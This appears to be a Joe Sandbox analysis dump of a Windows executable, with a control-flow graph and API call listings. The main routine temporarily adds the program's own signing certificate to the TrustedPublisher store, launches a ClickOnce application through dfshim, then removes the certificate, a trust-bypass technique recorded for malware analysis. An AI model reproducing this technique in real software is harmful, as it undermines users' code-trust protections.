6688->6689 6699 9c12ea 6688->6699 6691 9c12f2 6689->6691 6690 9c1270 __RTC_Initialize 6690->6688 6713 9c17f1 6690->6713 6693 9c1289 6693->6688 6716 9c18ab InitializeSListHead 6693->6716 6695 9c129f 6717 9c18ba 6695->6717 6697 9c12c2 6723 9c3891 6697->6723 6701 9c3829 6700->6701 6702 9c3806 6700->6702 6701->6686 6702->6701 6703 9c47f9 __dosmaperr 15 API calls 6702->6703 6704 9c3819 6703->6704 6705 9c473d _abort 21 API calls 6704->6705 6706 9c3824 6705->6706 6706->6686 6708 9c1674 6707->6708 6709 9c1670 6707->6709 6710 9c1681 ___scrt_release_startup_lock 6708->6710 6711 9c191f 4 API calls 6708->6711 6709->6690 6710->6690 6712 9c16ea 6711->6712 6730 9c17c4 6713->6730 6716->6695 6768 9c3e2a 6717->6768 6719 9c18cb 6720 9c18d2 6719->6720 6721 9c191f 4 API calls 6719->6721 6720->6697 6722 9c18da 6721->6722 6722->6697 6724 9c4424 _abort 33 API calls 6723->6724 6725 9c389c 6724->6725 6726 9c38d4 6725->6726 6727 9c47f9 __dosmaperr 15 API calls 6725->6727 6726->6688 6728 9c38c9 6727->6728 6729 9c473d _abort 21 API calls 6728->6729 6729->6726 6731 9c17da 6730->6731 6732 9c17d3 6730->6732 6739 9c3cf1 6731->6739 6736 9c3c81 6732->6736 6735 9c17d8 6735->6693 6737 9c3cf1 24 API calls 6736->6737 6738 9c3c93 6737->6738 6738->6735 6742 9c39f8 6739->6742 6745 9c392e 6742->6745 6744 9c3a1c 6744->6735 6746 9c393a ___scrt_is_nonwritable_in_current_image 6745->6746 6753 9c56e2 EnterCriticalSection 6746->6753 6748 9c3948 6754 9c3b40 6748->6754 6750 9c3955 6764 9c3973 6750->6764 6752 9c3966 _abort 6752->6744 6753->6748 6755 9c3b5e 6754->6755 6756 9c3b56 _abort 6754->6756 6755->6756 6757 9c3bb7 6755->6757 6758 9c681b 24 API calls 6755->6758 6756->6750 6757->6756 6759 9c681b 24 API calls 6757->6759 6760 9c3bad 6758->6760 6761 9c3bcd 6759->6761 6762 9c4869 _free 15 API calls 6760->6762 6763 9c4869 _free 15 API calls 6761->6763 6762->6757 6763->6756 6767 9c572a LeaveCriticalSection 6764->6767 6766 9c397d 6766->6752 6767->6766 6769 9c3e48 6768->6769 6772 9c3e68 6768->6772 6770 9c47f9 __dosmaperr 15 API calls 6769->6770 6771 9c3e5e 6770->6771 6773 9c473d _abort 21 API calls 6771->6773 6772->6719 6773->6772 5761 9c1489 5764 9c1853 5761->5764 5763 9c148e 5763->5763 5765 9c1869 5764->5765 5766 9c1872 5765->5766 5768 9c1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5765->5768 5766->5763 5768->5766 5769 9c4c8a 5774 9c4cbf 5769->5774 5772 9c4869 _free 15 API calls 5773 9c4ca6 5772->5773 5775 9c4cd1 5774->5775 5784 9c4c98 5774->5784 5776 9c4cd6 5775->5776 5777 9c4d01 5775->5777 5778 9c480c _abort 15 API calls 5776->5778 5777->5784 5785 9c681b 5777->5785 5779 9c4cdf 5778->5779 5781 9c4869 _free 15 API calls 5779->5781 5781->5784 5782 9c4d1c 5783 9c4869 _free 15 API calls 5782->5783 5783->5784 5784->5772 5784->5773 5786 9c6826 5785->5786 5787 9c684e 5786->5787 5788 9c683f 5786->5788 5789 9c685d 5787->5789 5794 9c7e13 5787->5794 5790 9c47f9 __dosmaperr 15 API calls 5788->5790 5801 9c7e46 5789->5801 5792 9c6844 _abort 5790->5792 5792->5782 5795 9c7e1e 5794->5795 5796 9c7e33 HeapSize 5794->5796 5797 9c47f9 __dosmaperr 15 API calls 5795->5797 5796->5789 5798 9c7e23 5797->5798 5799 9c473d _abort 21 API calls 5798->5799 5800 9c7e2e 5799->5800 5800->5789 5802 9c7e5e 5801->5802 5803 9c7e53 5801->5803 5805 9c7e66 5802->5805 5811 9c7e6f _abort 5802->5811 5804 9c62ff 16 API calls 5803->5804 5809 9c7e5b 5804->5809 5806 9c4869 _free 15 API calls 5805->5806 5806->5809 5807 9c7e99 HeapReAlloc 5807->5809 5807->5811 5808 9c7e74 5810 9c47f9 __dosmaperr 15 API calls 5808->5810 5809->5792 5810->5809 5811->5807 5811->5808 5812 9c6992 _abort 2 API calls 5811->5812 5812->5811 6001 9c98c5 6002 9c98ed 6001->6002 6003 9c9925 6002->6003 6004 9c991e 6002->6004 6005 9c9917 6002->6005 6014 9c9980 6004->6014 6010 9c9997 6005->6010 6011 9c99a0 6010->6011 6018 9ca06f 6011->6018 6013 9c991c 6015 9c99a0 6014->6015 6016 9ca06f __startOneArgErrorHandling 16 API calls 6015->6016 6017 9c9923 6016->6017 6019 9ca0ae __startOneArgErrorHandling 6018->6019 6022 9ca130 __startOneArgErrorHandling 6019->6022 6024 9ca472 6019->6024 6023 9ca166 _ValidateLocalCookies 6022->6023 6027 9ca786 6022->6027 6023->6013 6034 9ca495 6024->6034 6028 9ca7a8 6027->6028 6029 9ca793 6027->6029 6030 9c47f9 __dosmaperr 15 API calls 6028->6030 6031 9ca7ad 6029->6031 6032 9c47f9 __dosmaperr 15 API calls 6029->6032 6030->6031 6031->6023 6033 9ca7a0 6032->6033 6033->6023 6035 9ca4c0 __raise_exc 6034->6035 6036 9ca6b9 RaiseException 6035->6036 6037 9ca490 6036->6037 6037->6022 5813 9c3d86 5814 9c1f7d ___scrt_uninitialize_crt 7 API calls 5813->5814 5815 9c3d8d 5814->5815 6774 9c9146 IsProcessorFeaturePresent 6529 9c3400 6530 9c3418 6529->6530 6531 9c3412 6529->6531 6532 9c3376 15 API calls 6531->6532 6532->6530 6533 9c1e00 6537 9c1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6533->6537 6534 9c1e9e _ValidateLocalCookies 6536 9c1f27 _ValidateLocalCookies 6537->6534 6538 9c2340 RtlUnwind 6537->6538 6538->6536 6775 9c3d41 6778 9c341b 6775->6778 6779 9c342a 6778->6779 6780 9c3376 15 API calls 6779->6780 6781 9c3444 6780->6781 6782 9c3376 15 API calls 6781->6782 6783 9c344f 6782->6783 6784 9c1442 6785 9c1a6a GetModuleHandleW 6784->6785 6786 9c144a 6785->6786 6787 9c144e 6786->6787 6788 9c1480 6786->6788 6791 9c1459 6787->6791 6793 9c3775 6787->6793 6789 9c3793 _abort 23 API calls 6788->6789 6792 9c1488 6789->6792 6794 9c355e _abort 23 API calls 6793->6794 6795 9c3780 6794->6795 6795->6791 6038 9c9ec3 6039 9c9ecd 6038->6039 6040 9c9ed9 6038->6040 6039->6040 6041 9c9ed2 CloseHandle 6039->6041 6041->6040 6539 9c383f 6540 9c384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 9c3882 _abort 6540->6541 6547 9c56e2 EnterCriticalSection 6540->6547 6543 9c385f 6544 9c67cb __fassign 15 API calls 6543->6544 6545 9c386f 6544->6545 6548 9c3888 6545->6548 6547->6543 6551 9c572a LeaveCriticalSection 6548->6551 6550 9c388f 6550->6541 6551->6550 5816 9c1ab8 5817 9c1aef 5816->5817 5820 9c1aca 5816->5820 5820->5817 5825 9c209a 5820->5825 5837 9c23c3 5825->5837 5828 9c20a3 5829 9c23c3 43 API calls 5828->5829 5830 9c1b06 5829->5830 5831 9c3e89 5830->5831 5832 9c3e95 _abort 5831->5832 5833 9c4424 _abort 33 API calls 5832->5833 5835 9c3e9a 5833->5835 5834 9c3f24 _abort 33 API calls 5836 9c3ec4 5834->5836 5835->5834 5851 9c23d1 5837->5851 5839 9c23c8 5840 9c1afc 5839->5840 5841 9c6b14 _abort 2 API calls 5839->5841 5840->5828 5842 9c3f29 5841->5842 5843 9c3f35 5842->5843 5844 9c6b6f _abort 33 API calls 5842->5844 5845 9c3f3e IsProcessorFeaturePresent 5843->5845 5846 9c3f5c 5843->5846 5844->5843 5848 9c3f49 5845->5848 5847 9c3793 _abort 23 API calls 5846->5847 5850 9c3f66 5847->5850 5849 9c4573 _abort 3 API calls 5848->5849 5849->5846 5852 9c23dd GetLastError 5851->5852 5853 9c23da 5851->5853 5863 9c26a4 5852->5863 5853->5839 5856 9c2457 SetLastError 5856->5839 5857 9c26df ___vcrt_FlsSetValue 6 API calls 5858 9c240b 5857->5858 5859 9c2433 5858->5859 5860 9c26df ___vcrt_FlsSetValue 6 API calls 5858->5860 5862 9c2411 5858->5862 5861 9c26df ___vcrt_FlsSetValue 6 API calls 5859->5861 5859->5862 5860->5859 5861->5862 5862->5856 5864 9c2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5863->5864 5865 9c26be 5864->5865 5866 9c26d6 TlsGetValue 5865->5866 5867 9c23f2 5865->5867 5866->5867 5867->5856 5867->5857 5867->5862 5868 9c48bb 5869 9c48cb 5868->5869 5878 9c48e1 5868->5878 5870 9c47f9 __dosmaperr 15 API calls 5869->5870 5871 9c48d0 5870->5871 5873 9c473d _abort 21 API calls 5871->5873 5874 9c48da 5873->5874 5875 9c494b 5875->5875 5898 9c31ec 5875->5898 5877 9c49b9 5880 9c4869 _free 15 API calls 5877->5880 5878->5875 5881 9c4a2c 5878->5881 5887 9c4a4b 5878->5887 5879 9c49b0 5879->5877 5884 9c4a3e 5879->5884 5904 9c79bb 5879->5904 5880->5881 5913 9c4c65 5881->5913 5885 9c474d _abort 6 API calls 5884->5885 5886 9c4a4a 5885->5886 5888 9c4a57 5887->5888 5888->5888 5889 9c480c _abort 15 API calls 5888->5889 5890 9c4a85 5889->5890 5891 9c79bb 21 API calls 5890->5891 5892 9c4ab1 5891->5892 5893 9c474d _abort 6 API calls 5892->5893 5894 9c4ae0 _abort 5893->5894 5895 9c4b81 FindFirstFileExA 5894->5895 5896 9c4bd0 5895->5896 5897 9c4a4b 21 API calls 5896->5897 5899 9c3201 5898->5899 5900 9c31fd 5898->5900 5899->5900 5901 9c480c _abort 15 API calls 5899->5901 5900->5879 5902 9c322f 5901->5902 5903 9c4869 _free 15 API calls 5902->5903 5903->5900 5908 9c790a 5904->5908 5905 9c791f 5906 9c47f9 __dosmaperr 15 API calls 5905->5906 5907 9c7924 5905->5907 5909 9c794a 5906->5909 5907->5879 5908->5905 5908->5907 5911 9c795b 5908->5911 5910 9c473d _abort 21 API calls 5909->5910 5910->5907 5911->5907 5912 9c47f9 __dosmaperr 15 API calls 5911->5912 5912->5909 5914 9c4c6f 5913->5914 5915 9c4c7f 5914->5915 5916 9c4869 _free 15 API calls 5914->5916 5917 9c4869 _free 15 API calls 5915->5917 5916->5914 5918 9c4c86 5917->5918 5918->5874 5919 9c14bb IsProcessorFeaturePresent 5920 9c14d0 5919->5920 5923 9c1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5920->5923 5922 9c15b3 5923->5922 6042 9c12fb 6047 9c1aac SetUnhandledExceptionFilter 6042->6047 6044 9c1300 6048 9c38f9 6044->6048 6046 9c130b 6047->6044 6049 9c391f 6048->6049 6050 9c3905 6048->6050 6049->6046 6050->6049 6051 9c47f9 __dosmaperr 15 API calls 6050->6051 6052 9c390f 6051->6052 6053 9c473d _abort 21 API calls 6052->6053 6054 9c391a 6053->6054 6054->6046 6055 9c1ff4 6058 9c2042 6055->6058 6059 9c1fff 6058->6059 6060 9c204b 6058->6060 6060->6059 6061 9c23c3 43 API calls 6060->6061 6062 9c2086 6061->6062 6063 9c23c3 43 API calls 6062->6063 6064 9c2091 6063->6064 6065 9c3e89 33 API calls 6064->6065 6066 9c2099 6065->6066 5924 9c3eb5 5925 9c3eb8 5924->5925 5926 9c3f24 _abort 33 API calls 5925->5926 5927 9c3ec4 5926->5927 6796 9c7570 6797 9c75a9 6796->6797 6798 9c47f9 __dosmaperr 15 API calls 6797->6798 6802 9c75d5 _ValidateLocalCookies 6797->6802 6799 9c75b2 6798->6799 6800 9c473d _abort 21 API calls 6799->6800 6801 9c75bd _ValidateLocalCookies 6800->6801 6067 9c8df1 6068 9c8e15 6067->6068 6069 9c8e2e 6068->6069 6071 9c9beb __startOneArgErrorHandling 6068->6071 6072 9c8e78 6069->6072 6075 9c99d3 6069->6075 6074 9c9c2d __startOneArgErrorHandling 6071->6074 6083 9ca1c4 6071->6083 6076 9c99f0 DecodePointer 6075->6076 6077 9c9a00 6075->6077 6076->6077 6078 9c9a8d 6077->6078 6079 9c9a82 _ValidateLocalCookies 6077->6079 6081 9c9a37 6077->6081 6078->6079 6080 9c47f9 __dosmaperr 15 API calls 6078->6080 6079->6072 6080->6079 6081->6079 6082 9c47f9 __dosmaperr 15 API calls 6081->6082 6082->6079 6084 9ca1fd __startOneArgErrorHandling 6083->6084 6085 9ca495 __raise_exc RaiseException 6084->6085 6086 9ca224 __startOneArgErrorHandling 6084->6086 6085->6086 6087 9ca267 6086->6087 6088 9ca242 6086->6088 6089 9ca786 __startOneArgErrorHandling 15 API calls 6087->6089 6092 9ca7b5 6088->6092 6091 9ca262 __startOneArgErrorHandling _ValidateLocalCookies 6089->6091 6091->6074 6093 9ca7c4 6092->6093 6094 9ca838 __startOneArgErrorHandling 6093->6094 6096 9ca7e3 __startOneArgErrorHandling 6093->6096 6095 9ca786 __startOneArgErrorHandling 15 API calls 6094->6095 6098 9ca831 6095->6098 6097 9ca786 __startOneArgErrorHandling 15 API calls 6096->6097 6096->6098 6097->6098 6098->6091 6552 9c452d 6560 9c5858 6552->6560 6554 9c4537 6555 9c44a8 __dosmaperr 15 API calls 6554->6555 6559 9c4541 6554->6559 6556 9c4549 6555->6556 6557 9c4556 6556->6557 6565 9c4559 6556->6565 6561 9c5741 _abort 5 API calls 6560->6561 6562 9c587f 6561->6562 6563 9c5897 TlsAlloc 6562->6563 6564 9c5888 _ValidateLocalCookies 6562->6564 6563->6564 6564->6554 6566 9c4569 6565->6566 6567 9c4563 6565->6567 6566->6559 6569 9c58ae 6567->6569 6570 9c5741 _abort 5 API calls 6569->6570 6571 9c58d5 6570->6571 6572 9c58ed TlsFree 6571->6572 6573 9c58e1 _ValidateLocalCookies 6571->6573 6572->6573 6573->6566 6574 9c142e 6577 9c2cf0 6574->6577 6576 9c143f 6578 9c44a8 __dosmaperr 15 API calls 6577->6578 6579 9c2d07 _ValidateLocalCookies 6578->6579 6579->6576 6099 9c9beb 6100 9c9c04 __startOneArgErrorHandling 6099->6100 6101 9ca1c4 16 API calls 6100->6101 6102 9c9c2d __startOneArgErrorHandling 6100->6102 6101->6102 6103 9c33e5 6104 9c33fd 6103->6104 6105 9c33f7 6103->6105 6107 9c3376 6105->6107 6108 9c33a0 6107->6108 6109 9c3383 6107->6109 6108->6104 6110 9c339a 6109->6110 6111 9c4869 _free 15 API calls 6109->6111 6112 9c4869 _free 15 API calls 6110->6112 6111->6109 6112->6108 5928 9c5ba6 5929 9c5bd7 5928->5929 5930 9c5bb1 5928->5930 5930->5929 5931 9c5bc1 FreeLibrary 5930->5931 5931->5930 6580 9c6026 6583 9c602b 6580->6583 6582 9c604e 6583->6582 6584 9c5c56 6583->6584 6585 9c5c85 6584->6585 6586 9c5c63 6584->6586 6585->6583 6587 9c5c7f 6586->6587 6588 9c5c71 DeleteCriticalSection 6586->6588 6589 9c4869 _free 15 API calls 6587->6589 6588->6587 6588->6588 6589->6585 6803 9c9160 6806 9c917e 6803->6806 6805 9c9176 6807 9c9183 6806->6807 6808 9c99d3 16 API calls 6807->6808 6809 9c9218 6807->6809 6810 9c93af 6808->6810 6809->6805 6810->6805 5932 9c56a1 5933 9c56ac 5932->5933 5935 9c56d5 5933->5935 5936 9c56d1 5933->5936 5938 9c59b3 5933->5938 5943 9c56f9 5935->5943 5939 9c5741 _abort 5 API calls 5938->5939 5940 9c59da 5939->5940 5941 9c59f8 InitializeCriticalSectionAndSpinCount 5940->5941 5942 9c59e3 _ValidateLocalCookies 5940->5942 5941->5942 5942->5933 5944 9c5725 5943->5944 5945 9c5706 5943->5945 5944->5936 5946 9c5710 DeleteCriticalSection 5945->5946 5946->5944 5946->5946 6113 9c8ce1 6114 9c8d01 6113->6114 6117 9c8d38 6114->6117 6116 9c8d2b 6118 9c8d3f 6117->6118 6119 9c8da0 6118->6119 6123 9c8d5f 6118->6123 6120 9c988e 6119->6120 6121 9c9997 16 API calls 6119->6121 6120->6116 6122 9c8dee 6121->6122 6122->6116 6123->6120 6124 9c9997 16 API calls 6123->6124 6125 9c98be 6124->6125 6125->6116

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000104), ref: 009C1016
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009C1025
                                                                                                                                                                                                  • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009C1032
                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00040000), ref: 009C1057
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00040000), ref: 009C1063
                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009C1082
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009C10B2
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?), ref: 009C10C5
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00002000), ref: 009C10F4
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009C110A
                                                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009C111A
                                                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009C112D
                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 009C1134
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009C113E
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009C115D
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009C116E
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009C1182
                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009C1198
                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009C11A9
                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(dfshim), ref: 009C11BA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009C11C6
                                                                                                                                                                                                  • Sleep.KERNELBASE(00009C40), ref: 009C11E8
                                                                                                                                                                                                  • CertDeleteCertificateFromStore.CRYPT32(?), ref: 009C120B
                                                                                                                                                                                                  • CertCloseStore.CRYPT32(?,00000000), ref: 009C121A
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C1223
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C1228
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C122D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                  • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                  • API String ID: 335784236-860318880
                                                                                                                                                                                                  • Opcode ID: b8fe901ccb0b05bdd7f1fa9058f2abe57173951e0033dcf323f3ecac2ee9b67d
                                                                                                                                                                                                  • Instruction ID: a04546b855c1efb8e72ac4061d9740f6d027dfe63f2758bbcc30c27fe58dcc56
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8fe901ccb0b05bdd7f1fa9058f2abe57173951e0033dcf323f3ecac2ee9b67d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4616B71E54218AFEB20DB90DC4AFAFBBB9FF48B50F140018EA15B7291C77199019BA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009C192B
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 009C19F7
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009C1A10
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 009C1A1A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                  • Opcode ID: 33a36ba7108d9e31c9b2e257c19a9f5c36749fa3672718e63684ed8bb77f7eef
                                                                                                                                                                                                  • Instruction ID: 0da0a862360386049dc877107fbca57b70c85f6a345e33876f4b96b8523e3ed1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33a36ba7108d9e31c9b2e257c19a9f5c36749fa3672718e63684ed8bb77f7eef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 053126B5D052189BDF20DFA4D949BCDBBB8AF08300F1041AAE40CAB254EB709A84CF45
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009C466B
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009C4675
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009C4682
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                  • Opcode ID: c997fead2a5772ad6fba24a996e95cbfdd6d0b5903234701d5231b3ace2c0d08
                                                                                                                                                                                                  • Instruction ID: 079eeedbfbcfd2c08ff2a172ab119c53c284d1ee490b98ab5734f4c32ce0ff61
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c997fead2a5772ad6fba24a996e95cbfdd6d0b5903234701d5231b3ace2c0d08
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7431F474D012189BCB21DF64DD89B8DBBB8BF08310F5041EAE81CA7260EB709F818F45
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000,?,009C3F66,00000003,009C209F,009C1AFC), ref: 009C3698
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000,?,009C3F66,00000003,009C209F,009C1AFC), ref: 009C369F
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009C36B1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 448b38298eeb4bb4b33eb58f02c1f65162dab4808a870e71f1d33fd1cf012fb7
                                                                                                                                                                                                  • Instruction ID: 9578c0d90c74d3d5abfe1a2f28579ec6b256e90511a0f7c449bac89eaca4bcfd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 448b38298eeb4bb4b33eb58f02c1f65162dab4808a870e71f1d33fd1cf012fb7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE0B631824548AFCF11AF54DE0AF5A3B69EF84385F008018FA559B231DB35EE42DA55
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                  • Opcode ID: cd891330da1cc96362316498fa9960838f03465253194c7a41cc333854fa8e18
                                                                                                                                                                                                  • Instruction ID: 66326b8bffc85482c67b9b2ce19770f5f6df4bd885281948164552148b0be347
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd891330da1cc96362316498fa9960838f03465253194c7a41cc333854fa8e18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931F072E00249ABDB24CE78CC94FEE7BBDEB85314F0041ADF81897251E6309D408BA1
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009CA490,?,?,00000008,?,?,009CA130,00000000), ref: 009CA6C2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
